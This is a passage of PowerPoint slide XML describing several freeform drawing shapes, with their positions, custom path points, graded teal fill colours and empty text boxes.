          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10343" name="Freeform 424"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1417637" y="6927850"/>
            <a:ext cx="60325" cy="234950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T13" fmla="*/ 0 h 104"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T15" fmla="*/ 0 h 104"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T17" fmla="*/ 0 h 104"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T19" fmla="*/ 0 h 104"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T21" fmla="*/ 0 h 104"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T23" fmla="*/ 0 h 104"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T25" fmla="*/ 0 h 104"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T32" fmla="*/ 0 w 27"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T34" fmla="*/ 0 w 27"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T36" fmla="*/ 0 w 27"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 104"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 27"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 1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
              <a:gd name="T106" fmla="*/ 0 h 104"/>
              <a:gd name="T107" fmla="*/ 27 w 27"/>
              <a:gd name="T108" fmla="*/ 104 h 10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 h="104">
                <a:moveTo>
                  <a:pt x="27" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="99"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="93CCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10344" name="Freeform 425"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1420812" y="6931025"/>
            <a:ext cx="50800" cy="188913"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T11" fmla="*/ 0 h 84"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T13" fmla="*/ 0 h 84"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T15" fmla="*/ 0 h 84"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T17" fmla="*/ 0 h 84"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T19" fmla="*/ 0 h 84"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T21" fmla="*/ 0 h 84"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T23" fmla="*/ 0 h 84"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T25" fmla="*/ 0 h 84"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T27" fmla="*/ 0 h 84"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T32" fmla="*/ 0 w 22"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T34" fmla="*/ 0 w 22"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T36" fmla="*/ 0 w 22"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T38" fmla="*/ 0 w 22"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T69" fmla="*/ 2147483647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
              <a:gd name="T106" fmla="*/ 0 h 84"/>
              <a:gd name="T107" fmla="*/ 22 w 22"/>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 h="84">
                <a:moveTo>
                  <a:pt x="22" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A8D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10345" name="Freeform 426"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1423987" y="6931025"/>
            <a:ext cx="38100" cy="146050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T11" fmla="*/ 0 h 65"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T16" fmla="*/ 0 w 17"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T18" fmla="*/ 0 w 17"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T20" fmla="*/ 0 w 17"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 6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65"/>
              <a:gd name="T59" fmla="*/ 17 w 17"/>
              <a:gd name="T60" fmla="*/ 65 h 6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65">
                <a:moveTo>
                  <a:pt x="17" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BCE5E5"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10346" name="Freeform 427"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1423987" y="6932613"/>
            <a:ext cx="31750" cy="106362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 0 h 47"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T11" fmla="*/ 0 h 47"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T16" fmla="*/ 0 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T18" fmla="*/ 0 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 2147483647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47"/>
              <a:gd name="T59" fmla="*/ 14 w 14"/>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47">
                <a:moveTo>
                  <a:pt x="14" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D1F2F2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10347" name="Freeform 428"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1425575" y="6935788"/>
            <a:ext cx="20637" cy="60325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T9" fmla="*/ 0 h 27"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T11" fmla="*/ 0 h 27"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T13" fmla="*/ 0 h 27"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T16" fmla="*/ 0 w 9"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T18" fmla="*/ 0 w 9"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T20" fmla="*/ 0 w 9"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T37" fmla="*/ 2147483647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27"/>
              <a:gd name="T59" fmla="*/ 9 w 9"/>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27">
                <a:moveTo>
                  <a:pt x="9" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5FFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
